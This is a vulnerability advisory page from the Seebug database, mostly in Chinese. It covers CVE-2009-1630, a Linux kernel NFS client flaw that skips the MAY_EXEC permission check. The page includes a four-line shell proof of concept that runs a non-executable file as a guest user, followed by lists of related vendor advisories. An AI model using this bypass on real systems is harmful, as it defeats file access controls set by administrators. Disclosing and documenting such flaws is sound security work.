Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:11320
HistoryMay 17, 2009 - 12:00 a.m.

Linux Kernel NFS客户端实现MAY_EXEC权限检查漏洞

2009-05-1700:00:00
Root
www.seebug.org
44

0.001 Low

EPSS

Percentile

19.4%

JSON

BUGTRAQ ID: 34934
CVE(CAN) ID: CVE-2009-1630

Linux Kernel是开放源码操作系统Linux所使用的内核。

如果atomic_open可用的话,Linux kernel NFS客户端实现中fs/nfs/dir.c的nfs_permission函数没有检查执行(EXEC或MAY_EXEC)权限位,这允许本地用户绕过限制执行文件。

Linux kernel 2.6.x
Linux

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=“http://www.kernel.org/” target=“_blank”>http://www.kernel.org/</a>


                                                mount -t nfs4 server:/ /mnt4
echo &quot;ls&quot; &gt;/mnt4/foo
chmod 744 /mnt4/foo
su guest -c &quot;mnt4/foo&quot;

Related

veracode 1
cve 1
ubuntucve 1
securityvulns 5
prion 1
suse 3
nessus 24
openvas 32
osv 3
debian 3
redhat 3
oraclelinux 3
centos 1
ubuntu 1
vmware 2
veracode
veracode
Privilege Escalation
2020-04-10 00:34:01
cve
cve
CVE-2009-1630
2009-05-14 17:30:00
ubuntucve
ubuntucve
CVE-2009-1630
2009-05-14 00:00:00
securityvulns
securityvulns
Linux kernel DoS
2009-06-18 00:00:00
Linux kernel multiple security vulnerabilities
2009-06-02 00:00:00
[SECURITY] [DSA 1809-1] New Linux 2.6.26 packages fix several vulnerabilities
2009-06-02 00:00:00
prion
prion
Design/Logic Flaw
2009-05-14 17:30:00
suse
suse
remote denial of service in kernel
2009-07-23 18:24:28
local privilege escalation in kernel
2009-08-20 16:02:11
remote code execution in kernel
2009-06-09 09:26:36
nessus
nessus
SuSE 11 Security Update : Linux kernel (SAT Patch Numbers 1079 / 1087)
2011-01-21 00:00:00
openSUSE Security Update : kernel (kernel-1097)
2009-07-24 00:00:00
Debian DSA-1809-1 : linux-2.6 - denial of service, privilege escalation
2009-06-03 00:00:00
openvas
openvas
SLES10: Security update for Linux kernel
2009-10-13 00:00:00
SLES10: Security update for Linux kernel
2009-10-13 00:00:00
SuSE Security Advisory SUSE-SA:2009:038 (kernel)
2009-07-29 00:00:00
osv
osv
linux-2.6 user-mode-linux - several vulnerabilities
2009-06-01 00:00:00
fai-kernels linux-2.6 user-mode-linux - several vulnerabilities
2009-08-16 00:00:00
linux-2.6.24 - several vulnerabilities
2009-07-28 00:00:00
debian
debian
[SECURITY] [DSA 1809-1] New Linux 2.6.26 packages fix several vulnerabilities
2009-06-02 04:57:13
[SECURITY] [DSA 1865-1] New Linux 2.6.18 packages fix several vulnerabilities
2009-08-16 20:52:35
[SECURITY] [DSA 1844-1] New Linux 2.6.24 packages fix several vulnerabilities
2009-07-29 04:58:52
redhat
redhat
(RHSA-2009:1157) Important: kernel-rt security and bug fix update
2009-07-14 00:00:00
(RHSA-2009:1132) Important: kernel security and bug fix update
2009-06-30 00:00:00
(RHSA-2009:1106) Important: kernel security and bug fix update
2009-06-16 00:00:00
oraclelinux
oraclelinux
kernel security and bug fix update
2009-07-01 00:00:00
kernel security and bug fix update
2009-06-17 00:00:00
Oracle Enterprise Linux 5.4 kernel security and bug fix update
2009-09-08 00:00:00
centos
centos
kernel security update
2009-06-19 09:44:15
ubuntu
ubuntu
Linux kernel vulnerabilities
2009-07-02 00:00:00
vmware
vmware
VMware vCenter and ESX update release and vMA patch release address multiple security issues in third party components
2009-11-20 00:00:00
VMware vCenter and ESX update release and vMA patch release address multiple security issues in third party components.
2009-11-20 00:00:00

0.001 Low

EPSS

Percentile

19.4%

JSON
Related for SSV:11320
veracode1cve1ubuntucve1securityvulns5prion1suse3nessus24openvas32osv3debian3redhat3oraclelinux3centos1ubuntu1vmware2